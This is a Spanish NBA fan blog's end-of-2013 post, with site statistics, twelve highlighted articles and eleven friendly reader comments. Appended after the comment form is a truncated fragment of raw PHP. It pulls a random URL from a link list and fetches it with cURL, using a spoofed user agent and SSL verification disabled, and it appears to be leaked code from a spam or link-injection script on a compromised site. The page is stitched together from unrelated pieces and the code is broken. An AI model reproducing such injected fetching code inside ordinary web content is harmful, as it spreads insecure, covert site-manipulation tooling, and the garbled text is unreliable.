2013. Un fin de año más

29 de December de 2013 por txusma

Cuando se acerca el 31 de diciembre nos ponemos tiernos, levantamos la copa de cava, hablamos de lo que nos gusta el blog y de su buena salud, agradecemos vuestra presencia día sí y día también, seleccionamos 12 artículos de entre los escritos durante los últimos 12 meses  y brindamos por el futuro. Con este serán 6 ya los años que cumplimos la tradición (20122011201020092008) y como somos animales de costumbres no la romperemos este año.

Lo dicho. El número de visitas se mantiene constante pero nadie podrá negar que alrededor del blog se ha formado una pequeña comunidad de auténticos amantes de la NBA. Sabemos que por la red hay muchos reductos similares llenos de aficionados que no se contentan con lo que escriben el MARCA o el AS, pero el nuestro es especial. Ya sabemos muy bien de qué pie cojea cada uno (Denise y sus Magic, Esteban y sus Pacers, HisRoyalAirness y sus Wolves, Vader y sus Knicks…), echamos de menos a aquel que falta (¡exigimos la vuelta de Sancho!), colaboramos en todo lo que podemos para tirar adelante (¡1000 gracias Simon por esas crónicas!). Hay mucha páginas en las que informarse de verdad sobre la NBA pero no tantas con una vida tan plena, con tantos comentarios en una jornada normal. Y eso es gracias a todos y a cada uno de los que os pasáis por aquí para leer y comentar lo que un pequeño grupo de amigos que se conocieron en un foro por allá el 2003, empezaron a escribir en 2007.

A día de hoy, desde el 25 de Noviembre de 2007 (el día que empezamos a contabilizar las estadísticas) hemos servido casi 1.800.000 páginas y hemos recibido 769.411 visitas. No está nada mal, ¿verdad? Sólo en 2013 hemos abierto nuestras puertas a 38.714 visitas únicas. De estas se han quedado con nosotros relativamente pocas pero eso ya nos hace extremadamente felices.

Vamos allá con los 12 artículos de este 2013:

Rumores y noticias de agencia libre – No hace mucho que nos decantamos por centrar todas las visitas y comentarios sobre los movimientos que se producen en febrero o durante el verano en un único post. En lugar de ir escribiendo uno cada día, nos dedicamos a actualizar el que tenemos lo que hace más fácil enterarse de las novedades pero sobretodo mantener una buena conversación en los comentarios. Al final este artículo ha sido el más visitado del blog y el más comentado del año con 301 contribuciones.

Fin de semana: un respeto para los ‘pros’ – Todos lo sabemos. Llega el fin de semana, los cronistas se cogen unas vacaciones y la información queda en manos de los comentaristas habituales. Siempre respondéis pero este fin de semana en particular estuvisteis muy activos, comentando, incluso, un partido en directo.

El séptimo partido de la final se juega en TJNBA.com – Pues nos juntamos 6 o 7 a comentar el partido que enfrentó a Spurs y Heat y nos lo pasamos la mar de bien. Solo faltaron unas cervezas, una pantalla gigante y estar todos juntos físicamente en un bar.

¿Quién fue Gail Goodrich? – Cuando hay tiempo intentamos completar nuestra sección dedicada a personajes semidesconocidos de la NBA. En esta ocasión fue el turno de uno de los jugadores que tienen retirada su camiseta en el Staples Center de Los Angeles. No hay muchos…

Los 10 mejores jugadores de la NBA que nunca han disputado un All Star – Tremenda labor de investigación la que tuvimos que acometer para redactar este ránquing, único en su especie, diría.

Ser o no ser: Blake Griffin – Esteban decidió argumentar su opinión sobre Blake Griffin con un artículo muy completo y la respuesta del blog fue la esperada. Polémica, debate, argumentos a favor, argumentos en contra… Siempre decimos que los jugadores de la NBA leen nuestro blog a escondidas y este podría ser otro caso porque Griffin está cuajando una fenomenal temporada.

La llama incombustible – El 14 de Abril Kobe Bryant caía lesionado de gravedad y MagicJohnson32 le dedicó un gran artículo. Kobe Bryant ha vuelto aunque de forma fugaz. De todas maneras, yo sigo sin dudar que el año que viene lo dará todo por la camiseta amarillo y púrpura que viste desde 1996.

¿Quién será el número 1 del draft 2013? – El draft del 2013 era catalogado por malo por todos los analistas pero ser malo no quiere decir que carezca de emoción. Algo tan claro otros años como el número 1 era en este caso toda una incógnita. Nuestro compañero Jose_Dantley nos presentaba las opciones de una manera muy original.

El rey antes del rey – Tenemos una sección en la que TheDeerHunter revisa partidos históricos de vez en cuando. En este caso nos fijábamos en Bernard King y en su trágica carrera.

Reflexiones sobre la bocina #14 – Cuando el tiempo lo permite el gran MagicJohnson32 nos deleita con otra de sus “Reflexiones sobre la bocina”. Estas en particular resumían los hechos más destacados de la temporada 2012-2013. Como siempre, fantásticas.

Previa San Antonio Spurs – Los Angeles Lakers – Seleccionamos esta como podíamos haber seleccionado otra. Aparte de como muestra del seguimiento especial que hacemos de los playoffs, valga también como muestra de las colaboraciones que recibimos durante todo el año. Gracias de todo corazón a los Esteban, Simon, Rumbero, Denise, HisRoyalAirness, Pop, Melo, etc…

Se abre el telón – Final de año y principio de temporada. Nos enfrentábamos a una temporada apasionante como pocas  que se merecía un artículo de inauguración a la altura.

¡Feliz año 2014!

Comenta

11 comentarios a esta entrada

  1. jhc dice:
    #1

    Felicidades un año mas, aunque no sea un fijo y no suela escribir mucho, os visito dia si y dia tan bien para mi la mejor pagina sobre nba enhorabuena y que esto dure muchisimo maas

      Citar

  2. Pep dice:
    #2

    Felicidades y gracias un año más por vuestro excelente blog.

    A por 2014!

      Citar

  3. McNulty dice:
    #3

    No comento nunca pero os leo todos los días del año. Enhorabuena por el blog, seguid así y feliz año a todos!

      Citar

  4. dunc dice:
    #4

    Exactamente igual que McNulty.

    Os animo a seguir así, es un placer leeros!!

      Citar

  5. The wolf dice:
    #5

    Muchisimas gracias por seguir otro año más y feliz año a todos los blogueros!

      Citar

  6. Vader dice:
    #6

    Felicidades por otro año más!!! Espero que el blog siga activo muchos años más, muchas gracias por hacerlo posible!!!

    Un saludo a todos y feliz año nuevo!!!

      Citar

  7. Sancho88 dice:
    #7

    Venga… pues ya que lo decís vengo y posteo, que estoy entre toma y toma de bibe de mi peque. Sí, he sido papi y ahora tengo muchísimo menos tiempo, pero sigo siendo un loco de la nba. Supongo que en todos estos meses que he entrado poquísimo por aquí, Esteban habrá consagrado a la banca de los Pacers, Denise habrá cogido manía a unos cuantos jugadores y melo habrá puesto alguna a con h y alguna ha sin h. Prometo que empezaré a pasarme más a menudo. Feliz año a todos y a por todas con el 2014!! un abrazo muy fuerte

      Citar

  8. HisRoyalAirness dice:
    #8

    Sancho88:
    Venga… pues ya que lo decís vengo y posteo, que estoy entre toma y toma de bibe de mi peque. Sí, he sido papi y ahora tengo muchísimo menos tiempo, pero sigo siendo un loco de la nba. Supongo que en todos estos meses que he entrado poquísimo por aquí, Esteban habrá consagrado a la banca de los Pacers, Denise habrá cogido manía a unos cuantos jugadores y melo habrá puesto alguna a con h y alguna ha sin h. Prometo que empezaré a pasarme más a menudo. Feliz año a todos y a por todas con el 2014!! un abrazo muy fuerte

    Enhorabuena pater!!

    Y felicidades a todos, familia, que ya es como si nos conociéramos.

    Y, para que no falte, que sepáis que los Wolves estarían de terceros en la Conferencia Este!!

      Citar

  9. franitis dice:
    #9

    ¡Feliz año a todos y que vuelva Rondo yaaaaa!

      Citar

  10. Dantley dice:
    #10

    Felicidades a todos.

    Ha sido un gran año NBA con varios momentos cumbre, quizá los que más a partes iguales el fallo de Duncan y el triple de Ray Allen en unos playoffs espectaculares. Esperemos que 2014 nos de un año similar independientemente de los colores de cada uno.

      Citar

  11. rumbero dice:
    #11

    Felicidades un año más a los mandamases y colaboradores del blog y buena entrada de año para todos; padres y no padres, los que escriben y los que sólo leen (animaros leñe) y para todos los seguidores de la NBA, especialmente para los de Lakers y Knicks que se lo merecen.
    Feliz 2014 y que vuelvan los Sonics. Un abrazo y cuidadito no acabeis la noche como Sanders

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>